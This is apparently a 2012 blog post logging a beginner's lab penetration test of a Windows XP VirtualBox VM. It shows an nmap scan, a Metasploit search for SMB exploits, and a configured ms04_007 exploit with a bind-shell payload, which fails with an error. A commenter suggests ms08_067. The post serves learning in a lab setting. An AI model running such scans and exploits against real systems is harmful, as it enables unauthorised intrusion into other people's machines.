Jumat, 21 Desember 2012

IG, SE, VA and Exploitation SMB Windows XP3 on VirtualBox Backtrack 5


To perform pentest some stage we have to do.
First we have to do information gathering and Service Enumeration first.
now we do IG and SE use enmap tool.

Scanning with the enmap Tool
type the command #nmap -T4 -A -v 192.168.56.101

Nmap scan report for 192.168.56.101
Host is up (0.00054s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          WAR-FTPD 1.65 (Name Jgaa's Fan Club FTP Service)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:8E:6C:39 (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| nbstat: 
|   NetBIOS name: XPSP3, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:8e:6c:39 (Cadmus Computer Systems)
|   Names
|     XPSP3<00>            Flags: <unique><active>
|     WORKGROUP<00>        Flags: <group><active>
|     XPSP3<20>            Flags: <unique><active>
|     WORKGROUP<1e>        Flags: <group><active>
|     WORKGROUP<1d>        Flags: <unique><active>
|_    \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: xpsp3
|   NetBIOS computer name: XPSP3
|   Workgroup: WORKGROUP
|_  System time: 2012-12-22 01:25:23 UTC+7

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.101

NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
           Raw packets sent: 1106 (49.362KB) | Rcvd: 1017 (41.238KB)

Then we do Metasploit manually vulnerability
before we go into the directory root@bt:~# msfconsole 192.168.56.101

     ,           ,                                                                                 
    /             \                                                                                
   ((__---,,,---__))                                                                               
      (_) O O (_)_________                                                                         
         \ _ /            |\                                                                       
          o_o \   M S F   | \                                                                      
               \   _____  |  *                                                                     
                |||   WW|||                                                                        
                |||     |||                                                                        
                                                                                                   

       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
       =[ svn r15728 updated 134 days ago (2012.08.10)

Warning: This copy of the Metasploit Framework was last updated 134 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             https://community.rapid7.com/docs/DOC-1306

msf >
then we seach smb, type the command
msf > search smb
Matching Modules
================

   Name                                                        Disclosure Date          Rank       Description
   ----                                                              ---------------          ----       
Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms04_007_killbill                       2004-02-10 00:00:00 UTC  low        
Microsoft ASN.1 Library Bitstring Heap Overflow
   exploit/windows/smb/ms04_011_lsass                          2004-04-13 00:00:00 UTC  good       Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   exploit/windows/smb/ms04_031_netdde                         2004-10-12 00:00:00 UTC  good       Microsoft NetDDE Service Overflow
   exploit/windows/smb/ms05_039_pnp                            2005-08-09 00:00:00 UTC  good       Microsoft Plug and Play Service Overflow
   exploit/windows/smb/ms06_025_rasmans_reg                    2006-06-13 00:00:00 UTC  good       Microsoft RRAS Service RASMAN Registry Overflow
   exploit/windows/smb/ms06_025_rras                           2006-06-13 00:00:00 UTC  average    Microsoft RRAS Service Overflow
   exploit/windows/smb/ms06_040_netapi                         2006-08-08 00:00:00 UTC  good       Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_066_nwapi                          2006-11-14 00:00:00 UTC  good       Microsoft Services MS06-066 nwapi32.dll Module Exploit
   exploit/windows/smb/ms06_066_nwwks                          2006-11-14 00:00:00 UTC  good       Microsoft Services MS06-066 nwwks.dll Module Exploit
   exploit/windows/smb/ms06_070_wkssvc                         2006-11-14 00:00:00 UTC  manual     Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms07_029_msdns_zonename                 2007-04-12 00:00:00 UTC  manual     Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   exploit/windows/smb/ms08_067_netapi                         2008-10-28 00:00:00 UTC  great      Microsoft Server Service Relative Path Stack Corruption
   exploit/windows/smb/ms09_050_smb2_negotiate_func_index      2009-09-07 00:00:00 UTC  good       Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   exploit/windows/smb/ms10_061_spoolss                        2010-09-14 00:00:00 UTC  excellent  Microsoft Print Spooler Service Impersonation Vulnerability
   exploit/windows/smb/netidentity_xtierrpcpipe                2009-04-06 00:00:00 UTC  great      


then select one of the smb modules that will be exploit. Type the command 
msf > use exploit/windows/smb/ms04_007_killbill

then, type the command
msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1

msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----               ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST                   yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf  exploit(ms04_007_killbill) > set RHOST 192.168.56.101
RHOST => 192.168.56.101


msf  exploit(ms04_007_killbill) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp


msf  exploit(ms04_007_killbill) > show options 

Module options (exploit/windows/smb/ms04_007_killbill):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   PROTO  smb              yes       Which protocol to use: http or smb
   RHOST  192.168.56.101   yes       The target address
   RPORT  445              yes       Set the SMB service port


Payload options (windows/shell/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST     192.168.56.101   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf  exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0

msf  exploit(ms04_007_killbill) > exploit 

[*] Started bind handler
[-] Error: The server responded with error: STATUS_INVALID_PARAMETER (Command=115 WordCount=0)


Scanning With Nessus Tool


Then Type the Button Launch Scan



Sorry still error, please help further :-)








1 komentar:

  1. Hi, I'm using ms08_067_netapi
    here: http://scx030c067.blogspot.com/2012/12/exploit-ms08-067-in-windows-xp.html

    BalasHapus